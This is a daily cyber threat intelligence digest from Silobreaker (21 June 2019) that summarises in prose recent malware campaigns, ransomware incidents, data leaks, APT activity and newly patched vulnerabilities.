Silobreaker Daily Cyber Digest – 21 June 2019
LoudMiner bundled with pirated VST software
- Researchers at ESET observed that the miner, dubbed LoudMiner, has been distributed for macOS and Windows since 2018. LoudMiner mines Monero and comes bundled with VST software. It uses QEMU on macOS, and VirtualBox on Windows to mine on a Tiny Core Linux virtual machine.
- Researchers observed 137-VST related applications available on a single WordPress-based domain. The frequently updated applications, assumed to all be Trojanized, are hosted on 29 external servers.
- Four different versions of LoudMiner were uncovered, three for macOS and one for Windows. Forum threads showed a user complaining that LoudMiner was taking up 100% of their CPU.
Source (Includes IOCs)
New Mac cryptocurrency miner discovered
- Researchers at Malwarebytes Labs first found the miner, dubbed Bird Miner, in a cracked installer for the music production software Ableton Live which is hosted on piracy site VST Crack.
- When downloaded the malware drops a number of files, three of which launch daemons that run three different shell scripts. If the scripts detect that Activity Monitor is running, then Bird Miner bails out. If no Activity Monitor is detected, then Bird Miner runs two separate miners running from separate 130 MB QEMU image files which obfuscates the miner’s code.
Source (Includes IOCs)
Necurs botnet spam campaign discovered
- Observed by researchers at Trustwave, the Necurs botnet spam campaign delivers a HTML redirector, used to perform a DNS query to obtain the spammer’s DNS TXT record and subsequently execute it. The victim will then be redirected to scam websites and receive unwanted advertisements.
- The current advertisements delivered are described by researchers at harmless, but it would be trivial for operators to switch what is delivered to something more harmful.
Source (Includes IOCs)
Managed Service Providers hacked to deliver ransomware
- It is alleged that at least three managed service providers have been breached, with their toolset being used to deploy Sodinokibi ransomware on customers systems, primarily via Webroot SecureAnywhere. Upon investigation, it appears that hackers breached the MSPs by exploiting exposed Remote Desktop Endpoints, before elevating their privileges and uninstalling antivirus products.
- Consequently, Webroot forcibly enabled 2FA on all SecureAnywhere accounts. Chad Bacher, SVP of Products at Webroot, stated that their Advanced Malware Removal team discovered a ‘small number of customers were impacted by a threat actor exploiting a combination of customers’ weak cyber hygiene practices around authentication and RDP’.
Iran allegedly targets US organisations in newly discovered campaign
- Crowdstrike and Dragos have reportedly discovered a new campaign last week by APT33 leveraging targeted phishing emails against US targets, including the Department of Energy and US national labs. FireEye has also reported on a newly discovered Iranian phishing campaign targeting government agencies and private sectors in the US and Europe, though they do not specifically mention APT33.
- In the recent campaign, hackers sent potential victims phishing emails posing as job openings from the Council of Economic Advisors. The email contained a link, that if clicked opened an HTML application that launched a Visual Basic script that installed Powerton malware.
- The techniques tactics and procedures displayed in this campaign match the previous behaviour associated with APT33. It is believed that the latest campaign is in some way connected to the current political tensions between Iran and the US.
Ransom payment demanded by DanaBot banking Trojan in European campaigns
- Check Point Researchers observed the DanaBot Trojan being used to drop ransomware written in Delphi. DanaBot, first tracked in August 2018, continues to grow in capability, the latest ransomware addition was spotted in May 2019 and is a simple ‘copy-paste’ encryptor.
Cryptocurrency-Mining Botnet Malware delivered through Android Debug Bridge
- Researchers at Trend Micro observed that the attack takes advantage of ADB ports which by default have no authentication. The bot is then able to spread to any system that has had a previous SSH connection with the host.
- The attacks uses the ADB command shell to alter the attacked systems working directory and then determines whether it has entered a honeypot. The bot then uses wget to download the payload which can be one of three downloadable miners all of which are downloaded from the same URL.
- The malware has been observed in 21 countries, with the highest percentage found in South Korea.
Source (Includes IOCs)
CISA warn of Department of Homeland Security phishing scam
- The Cybersecurity and Infrastructure Security Agency (CISA) released a statement on June 18th, 2019, warning of a phishing campaign that tricks users by appearing to be a DHS notification.
- The email campaign looks like a National Cyber Awareness System alert and contains a malicious attachment containing malware.
Turla utilize custom malware and custom toolsets in ongoing campaign
- Researchers at Symantec observed Russian espionage group Turla APT launching a series of campaigns against governments and international organizations in Europe, South America, the Middle East, South Asia and Southeast Asia.
- The groups activity over the last eighteen months can be divided into three different campaigns, characterised by differing toolsets. The first uses the Neptun backdoor installed on Microsoft Exchange server. Neptun can be used to download tools, upload files and execute shell commands. The second utilized Meterpreter alongside a custom backdoor called photobased[.]dll and a custom RPC backdoor. The third deployed a custom RPC backdoor to execute Power shell scripts.
- Symantec researchers also observed an instance of Turla hacking into the servers of APT34. Turla used APT34’s C2 servers to drop their own malware on computers that were infected by APT34. Symantec researchers stated that Turla’s presence on these servers went undetected.
Source (Includes IOCs)
Leaks and Breaches
Village of Palm Springs suffered cyber attack
- Palm Springs Village Manager Rich Reade stated that the Village of Palm Springs was hit by a cyber-attack over a year ago. According to Reade, a phishing email was sent, that infected their network with malware dubbed Amnesia 3.
- The hackers reportedly split the ransom request into three decryption keys, for which the village paid for the first and second, however, upon realising that these did not encrypt all their files they refused to pay for the third. Approximately $1,200 worth of Bitcoin was sent to the hackers.
Medical database suffers data leak
- Discovered by the security team at vpnMentor, the leaked MongoDB database contained information on 391,649 Vascepa prescriptions, as well as other data about 78,000 patients who were prescribed the drug in the past. The database was accessible without a password, and data within included full names, addresses, email addresses, and data about the prescribing doctor.
- It is suspected that the database belongs to ConntectiveRX due to tags within the data, but ZDNet reached out to various organisations, but none have issued a response.
Desjardin Group data leak exposes information of 2.9 million members
- Desjardins Group, the largest association of credit unions in North America, became aware of a data leak on June 14th, 2019. The group said that they were made aware thanks to the Laval Police, who informed them that the details of more than 2.9 million members had been disclosed.
- Of the 2.9 million members, 2.7 million were personal members and 173,000 were business members. Leaked business details included business names, business addresses, business phone numbers, owners’ names, and more. Disclosed personal details included names, dates of birth, social insurance numbers, details of banking habits, and more.
Romanian hospitals affected by BadRabbit 4 ransomware
- The Romanian Intelligence Service (SRI) announced that four hospitals were targeted by BadRabbit 4 ransomware. The impacted hospitals include the Victor Babeş Infectious Diseases Hospital in Bucharest and three other facilities located in Huşi, Dorohoi and Cărbuneşti.
- According to health minister Sorina Pintea, although hospital systems were impacted, the incident does not impact individual patients.
Microsoft patch spoofing vulnerability discovered in Outlook for Android
- The flaw, tracked as CVE-2019-1105, could be exploited by an authenticated hacker by sending a specially-crafted email to the victim. A successful exploitation would allow an attacker to perform a cross-site-scripting attack and run scripts in the context of the current user.
Vulnerability discovered in Dell SupportAssist
- Identified as CVE-2019-12280, the privilege escalation vulnerability exists in Dell SupportAssist for Business PCs version 2.0.1 and Dell SupportAssist for Home PCs version 3.2.2. The flaw could allow malware and rogue users to gain administrative privileges, as a result of insecurely loading .dll files when run, including unsigned code from user folders.
- Dell have released a patch for the software, urging users to update to the latest version.
Used Nest cameras permit access for previous owners
- A member of Facebook Winks Users group discovered that after selling their Nest camera, they were still able to access live images of the camera at the new property, even after a factory reset.
- This was reported to Google, who have since rolled out a fix that will automatically update all Nest cameras.
Cisco announces multiple vulnerabilities
- Cisco announced 26 vulnerabilities in the past 48 hours, including two critical flaws CVE-2019-1625, a Cisco SD-WAN solution privilege escalation flaw and CVE-2019-1848, an authentication bypass issue in Cisco DNA Center. As a result, CVE-2019-1625 could allow an attacker to make system configuration changes.
Flaw patched in BIND
- A race condition vulnerability, tracked as CVE-2019-6471, has been patched in BIND that could have led to an attacker being able to perform a denial-of-service condition on a target device.
Firefox release patch for second zero-day used against cryptocurrency firms
- Following the release of patch 67.0.4 that addressed CVE 2019-11707, Mozilla have released patch 67.0.4 to fix CVE 2019-11708.
- CVE 2019-11708 is a Sandbox escape flaw, that was used in a chain attack in combination with CVE 2019-11707. The chain attack allowed attackers to remotely execute malicious code on target computers. The zero-day was used to target Coinbase employees and other cryptocurrency firms.
- In a separate case, a Mac user reported to researcher Patrick Wardle that he too was targeted. The user received a phishing email containing a URL which, once clicked, proceeded to download Netwire RAT, which grants an attacker full access to the infected device.
NASA’s Jet Propulsion Laboratory still has security weaknesses
- The Office of Inspector General has found that NASA’s Jet Propulsion Laboratory (JPL) suffers from multiple security weaknesses. The research centre’s security controls were audited after the organisation suffered a security breach in April 2018. The breach was the result of a Raspberry Pi, not authorized to be linked to the JPL network, being targeted by hackers.
- The report states that the existing multiple IT security control weaknesses reduce JPL’s ability to ‘prevent, detect, and mitigate attacks targeting its systems and networks’.
Over half of phishing sites use HTTPS
- Researchers at PhishLabs observed that by the end of Q1 2019, 58% of phishing sites were employing HTTPS. HTTPS are increasingly used by threat actors to prevent browsers from flagging them as suspicious and to act as a social engineering tool, convincing visitors to divulge information.
CertUtil tool reportedly being used by hacker groups in the wild
- SentinelOne reported that the admin command line tool CertUtil[.]exe is being used by hackers as a replacement for PowerShell, for tasks such as downloading a file from a remote URL, and encoding and decoding a Base64-obfuscated payload.
- SentinelOne’s report includes an in-depth analysis of how hacker groups are using this tool in the wild.
New ‘Process Reimaging’ technique can bypass endpoint security solutions
- McAfee researchers developed a new post-exploitation technique, dubbed ‘Process Reimaging’ that is similar to ‘Process Doppelganging’ or ‘Process Hollowing’ techniques, but is easier to execute as it requires no code injection.
- The technique was successfully tested against current version of Microsoft Windows and Windows Defender. However, the researchers state that it is likely to work on any endpoint security vendor or product implementing APIs outlined in their report.
- The process works by leveraging inconsistencies in how Windows OS determines FILE_OBJECT locations. This affects the ability of endpoint security solutions to identify correct binaries in malicious processes.
The Silobreaker Team Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.